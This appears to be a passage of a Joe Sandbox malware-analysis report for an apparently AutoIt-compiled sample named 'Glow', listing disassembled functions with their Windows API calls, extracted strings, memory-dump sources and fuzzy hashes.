                                                                                                                                                                          • Instruction ID: f212a8a1a16694e486f972fcfdda6f803b3bb1366ab9aca9cb1d62de3e7e041d
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b1fbb8257d8eec77e34d0d73c28ca0cd458d247b965b26a8b9a1ee1ad7b513f
                                                                                                                                                                          • Instruction Fuzzy Hash: A6319071510604AADB10DF65CC80BFB77A9FF88724F10861EF9A987290DA75AC81D764
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 004150BD
                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004150D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: '
                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                          • Opcode ID: 810791f7d20f2f9c57d87900b6bf4861db8d808bea801627b85ce9e4fef44235
                                                                                                                                                                          • Instruction ID: 728162735f1e1af475d4bfc3d2bc2cf61366f7e0ad1ef55e8fb852e74cc9852a
                                                                                                                                                                          • Opcode Fuzzy Hash: 810791f7d20f2f9c57d87900b6bf4861db8d808bea801627b85ce9e4fef44235
                                                                                                                                                                          • Instruction Fuzzy Hash: C231F874A0170ADFDB14CFA9C980BDA7BB5FF89300F10406AE904AB392D775A985CF94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                            • Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242
                                                                                                                                                                          • GetParent.USER32(?), ref: 003C3440
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 003C34CA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongWindow$ParentProc
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 2181805148-3218771753
                                                                                                                                                                          • Opcode ID: 753c2b510ac983694766fc89540b8da9c881957de43f4c7b40fbb03d16d880f3
                                                                                                                                                                          • Instruction ID: ea10317d447d7b6b2bc0a63fa30f0c469e9b70f046faa7b3c4ee5982729d2cde
                                                                                                                                                                          • Opcode Fuzzy Hash: 753c2b510ac983694766fc89540b8da9c881957de43f4c7b40fbb03d16d880f3
                                                                                                                                                                          • Instruction Fuzzy Hash: F521D670601244AFCB2BAF79CC4DEA63B66EF06360F158294F6254B2F2C7318E51D710
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00387873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003878B1
                                                                                                                                                                            • Part of subcall function 00387873: GetStockObject.GDI32(00000011), ref: 003878C5
                                                                                                                                                                            • Part of subcall function 00387873: SendMessageW.USER32(00000000,00000030,00000000), ref: 003878CF
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00414216
                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 00414230
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                          • Opcode ID: 6f9643a394e320b7bdcb022f2ebdd913aede30898fb56c3548a56bc064c2ec0a
                                                                                                                                                                          • Instruction ID: b4b04d2e0033e0e9039338373011c4d3447c2d28b77cd5c01d9352fc949aca8d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6f9643a394e320b7bdcb022f2ebdd913aede30898fb56c3548a56bc064c2ec0a
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F113AB2A10209AFDB01DFA8CC45AFA7BF8EB48354F014925FD55D3250D778E891DB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003FD7C2
                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003FD7EB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                          • Opcode ID: 6ab51aa69dbf45d723a40cd5dac4882e3a02bd45aa72d1d8d5bd6f6ff938d6bc
                                                                                                                                                                          • Instruction ID: 77c3967740b8aa7ce49d9fb83cd9c884afc584317eeeebe281a566b7ac459c10
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ab51aa69dbf45d723a40cd5dac4882e3a02bd45aa72d1d8d5bd6f6ff938d6bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 1911297250123AB9D7395F628C4DFF7BF5EEB127A4F104226F6198B180D3649848D2F0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 003E761D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003E7629
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                          • Opcode ID: 25353f97a24408b7043239271e6e348438146064c51f725465d1d4901ba157c8
                                                                                                                                                                          • Instruction ID: 5966600733a003c85dbdc26c45e34a930859a03705a0995a4fb5c1afda5163cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 25353f97a24408b7043239271e6e348438146064c51f725465d1d4901ba157c8
                                                                                                                                                                          • Instruction Fuzzy Hash: D3010432A04A778BCB22AFBECC408BF73B5BB603587410A34E421961D1EB71D8008350
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003E2699
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 4640180f24ef3b7f9c5972073b5aecb6aa5e2ef98661dc74dfa5143e12d49d01
                                                                                                                                                                          • Instruction ID: a87ca453c536caf5dd25060e5fcfd1775e875f91c5d79e4be9b8483dbe129661
                                                                                                                                                                          • Opcode Fuzzy Hash: 4640180f24ef3b7f9c5972073b5aecb6aa5e2ef98661dc74dfa5143e12d49d01
                                                                                                                                                                          • Instruction Fuzzy Hash: CF01B175A00275ABCB06FBA5CC51DFE77A8EF46350B10071AA872AB2D2DBB1580CC751
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 003E2593
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 8ff53136e881ef7f5904c1834c8177afd85afa022726e7bcf5d8f1c85d57a0c1
                                                                                                                                                                          • Instruction ID: 9719e158a8ba06e87f9436d8f2861f03e1dd17b8eedef4a70c329a6adda5d048
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ff53136e881ef7f5904c1834c8177afd85afa022726e7bcf5d8f1c85d57a0c1
                                                                                                                                                                          • Instruction Fuzzy Hash: DD01D4B5A40255ABCB06EBA1C922EFFB3ACDF47340F14012A6802A72C1DB509A0887B1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003E2615
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 319856f9ddd988ff14c1721d67cfaf0f3dcced40a482681721748f0295d97a8e
                                                                                                                                                                          • Instruction ID: a53cf338b5a2dbca0973d6196902f72eb9c52e7300c23e4ac80ef3a8420ac2c8
                                                                                                                                                                          • Opcode Fuzzy Hash: 319856f9ddd988ff14c1721d67cfaf0f3dcced40a482681721748f0295d97a8e
                                                                                                                                                                          • Instruction Fuzzy Hash: 7801A776A4025566CB17F761C901EFF77ACDB06340F5402267842B71C2DB959E08D6B6
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 003E2720
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: e090d59d9bea087e908c375ba79a8b7a26c4ea80d0e89e7970ee7cefe0f54aca
                                                                                                                                                                          • Instruction ID: 507f98a73863280af0fe63945b5d18fee470e35e193d091382d7ab4838c3336b
                                                                                                                                                                          • Opcode Fuzzy Hash: e090d59d9bea087e908c375ba79a8b7a26c4ea80d0e89e7970ee7cefe0f54aca
                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0F475A4036566DB06F7A48C41FFFB7ACEF06340F400A16B462A72C2DB60580CC260
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00419B6D
                                                                                                                                                                            • Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00419B53
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongWindow$MessageProcSend
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 982171247-3218771753
                                                                                                                                                                          • Opcode ID: af51f864a72300a8ad4c5204e3628eba2d402dd5e66911bdb1a9d7e9ebf60e57
                                                                                                                                                                          • Instruction ID: 41cdf5f2aee9c3da8450df1cac4f69419b20a83be32eb61ff8adbffb73a1663c
                                                                                                                                                                          • Opcode Fuzzy Hash: af51f864a72300a8ad4c5204e3628eba2d402dd5e66911bdb1a9d7e9ebf60e57
                                                                                                                                                                          • Instruction Fuzzy Hash: C1012430209304ABCB25AF10EC55F963B76FF81325F00056AF9020B2F1C7766C82CB58
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2<;$j3B
                                                                                                                                                                          • API String ID: 0-24122967
                                                                                                                                                                          • Opcode ID: bfbb27d4e61f5edf51d7fb8a50f872a28149415f740ce76b184e5dcdd1e73541
                                                                                                                                                                          • Instruction ID: 23fe67065f21f2fe9859c75bdca12132a7034908aae934e96214a22d176a00c6
                                                                                                                                                                          • Opcode Fuzzy Hash: bfbb27d4e61f5edf51d7fb8a50f872a28149415f740ce76b184e5dcdd1e73541
                                                                                                                                                                          • Instruction Fuzzy Hash: A0F02438510158EADB119F90C840AF933B8DF04704F20406ABECAC7A80FB749F80D369
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00418471
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041847F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 1378638983-3218771753
                                                                                                                                                                          • Opcode ID: b57bcca8613794cc1ed75413a36ef2d352baf94d3aa3770150d06718b0da2f7c
                                                                                                                                                                          • Instruction ID: 58dcbb63b0964fd8ee4c889a3f07b3c6d4f00306c7e497f447dd1b27629a7206
                                                                                                                                                                          • Opcode Fuzzy Hash: b57bcca8613794cc1ed75413a36ef2d352baf94d3aa3770150d06718b0da2f7c
                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0A9712003049FC704EF68DC00DAA77A5FB8A321B20862EF9268B3F1DB709840DB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003E146F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message
                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                          • Opcode ID: 8e0d0dd7543b27faa910e4e72c79afac6aa2f1719c045d10fcb69b88c4efb96a
                                                                                                                                                                          • Instruction ID: eef43cb055aecaf05da4940299d1d30be924d7d2228a536bbf11abcc9c07a285
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e0d0dd7543b27faa910e4e72c79afac6aa2f1719c045d10fcb69b88c4efb96a
                                                                                                                                                                          • Instruction Fuzzy Hash: A5E0D87174472436D2153794AC03FC47784CF06B61F21482BF748584C29EE6649042DD
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0039FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003A10E2,?,?,?,0038100A), ref: 0039FAD9
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0038100A), ref: 003A10E6
                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0038100A), ref: 003A10F5
                                                                                                                                                                          Strings
                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003A10F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                          • Opcode ID: 90cbc7d4d2e72bb1a76ad20a05d8210a6f5754129c5f93e7ca649d46c0c1857e
                                                                                                                                                                          • Instruction ID: c5206b3b7334e1c24f608c9dcd6a0cc9b08e3a36244e64967cee2b1f1ded5e8a
                                                                                                                                                                          • Opcode Fuzzy Hash: 90cbc7d4d2e72bb1a76ad20a05d8210a6f5754129c5f93e7ca649d46c0c1857e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DE092B06007208FD3319F75E904342BBE4EF05301F118DADE895C6652DBB8D488CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0039F151
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
